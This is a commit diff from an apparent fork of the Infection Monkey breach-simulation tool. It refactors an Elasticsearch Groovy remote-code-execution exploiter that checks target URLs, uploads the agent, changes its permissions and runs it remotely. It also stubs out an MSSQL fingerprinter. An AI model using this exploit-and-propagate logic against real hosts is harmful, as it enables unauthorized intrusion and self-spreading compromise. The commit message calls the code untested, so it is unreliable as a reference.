forked from p34709852/monkey
Uploaded and modified standard web_rce code usage.Not working, not tested
This commit is contained in:
parent
3f809403d1
commit
8ddfb03f27
|
@ -9,17 +9,17 @@ import logging
|
|||
|
||||
import requests
|
||||
|
||||
from exploit import HostExploiter
|
||||
from model import DROPPER_ARG
|
||||
from network.elasticfinger import ES_SERVICE, ES_PORT
|
||||
from tools import get_target_monkey, HTTPTools, build_monkey_commandline, get_monkey_depth
|
||||
from exploit.web_rce import WebRCE
|
||||
|
||||
__author__ = 'danielg'
|
||||
|
||||
LOG = logging.getLogger(__name__)
|
||||
|
||||
|
||||
class ElasticGroovyExploiter(HostExploiter):
|
||||
class ElasticGroovyExploiter(WebRCE):
|
||||
# attack URLs
|
||||
BASE_URL = 'http://%s:%s/_search?pretty'
|
||||
MONKEY_RESULT_FIELD = "monkey_result"
|
||||
|
@ -38,40 +38,52 @@ class ElasticGroovyExploiter(HostExploiter):
|
|||
|
||||
def __init__(self, host):
|
||||
super(ElasticGroovyExploiter, self).__init__(host)
|
||||
self._config = __import__('config').WormConfiguration
|
||||
self.skip_exist = self._config.skip_exploit_if_file_exist
|
||||
|
||||
def is_os_supported(self):
|
||||
"""
|
||||
Checks if the host is vulnerable.
|
||||
Either using version string or by trying to attack
|
||||
:return:
|
||||
"""
|
||||
if not super(ElasticGroovyExploiter, self).is_os_supported():
|
||||
return False
|
||||
|
||||
def exploit_host(self):
|
||||
# self.exploit_host_linux()
|
||||
if ES_SERVICE not in self.host.services:
|
||||
LOG.info("Host: %s doesn't have ES open" % self.host.ip_addr)
|
||||
return False
|
||||
major, minor, build = self.host.services[ES_SERVICE]['version'].split('.')
|
||||
major = int(major)
|
||||
minor = int(minor)
|
||||
build = int(build)
|
||||
if major > 1:
|
||||
# We need a reference to the exploiter for WebRCE framework to use
|
||||
exploiter = self.exploit
|
||||
# Build url from host and elastic port(not https)
|
||||
urls = WebRCE.build_potential_urls(self.host, [[ES_PORT, False]], ['_search?pretty'])
|
||||
vulnerable_urls = []
|
||||
for url in urls:
|
||||
if WebRCE.check_if_exploitable(exploiter, url):
|
||||
vulnerable_urls.append(url)
|
||||
self._exploit_info['vulnerable_urls'] = vulnerable_urls
|
||||
if not vulnerable_urls:
|
||||
return False
|
||||
if major == 1 and minor > 4:
|
||||
return False
|
||||
if major == 1 and minor == 4 and build > 2:
|
||||
return False
|
||||
return self.is_vulnerable()
|
||||
|
||||
def exploit_host(self):
|
||||
real_host_os = self.get_host_os()
|
||||
self.host.os['type'] = str(real_host_os.lower()) # strip unicode characters
|
||||
if 'linux' in self.host.os['type']:
|
||||
return self.exploit_host_linux()
|
||||
else:
|
||||
return self.exploit_host_windows()
|
||||
if self.skip_exist and WebRCE.check_remote_files(self.host, exploiter, vulnerable_urls[0], self._config):
|
||||
LOG.info("Host %s was already infected under the current configuration, done" % self.host)
|
||||
return True
|
||||
|
||||
if not WebRCE.set_host_arch(self.host, exploiter, vulnerable_urls[0]):
|
||||
return False
|
||||
|
||||
data = WebRCE.upload_monkey(self.host, self._config, exploiter, vulnerable_urls[0])
|
||||
|
||||
# We can't use 'if not' because response may be ''
|
||||
if data is not False and data['response'] == False:
|
||||
return False
|
||||
|
||||
if WebRCE.change_permissions(self.host, vulnerable_urls[0], exploiter, data['path']) == False:
|
||||
return False
|
||||
|
||||
if WebRCE.execute_remote_monkey(self.host, vulnerable_urls[0], exploiter, data['path'], True) == False:
|
||||
return False
|
||||
|
||||
return True
|
||||
|
||||
def exploit(self, url, command):
|
||||
payload = self.JAVA_CMD % command
|
||||
response = requests.get(url, data=payload)
|
||||
result = self.get_results(response)
|
||||
if not result: # not vulnerable
|
||||
return False
|
||||
return result[0]
|
||||
|
||||
def exploit_host_windows(self):
|
||||
"""
|
||||
|
|
|
@ -29,7 +29,8 @@ class MSSQLFinger(HostFinger):
|
|||
Discovered server information written to the Host info struct.
|
||||
True if success, False otherwise.
|
||||
"""
|
||||
|
||||
# TODO remove auto-return
|
||||
return False
|
||||
assert isinstance(host, VictimHost)
|
||||
|
||||
# Create a UDP socket and sets a timeout
|
||||
|
|
Loading…
Reference in New Issue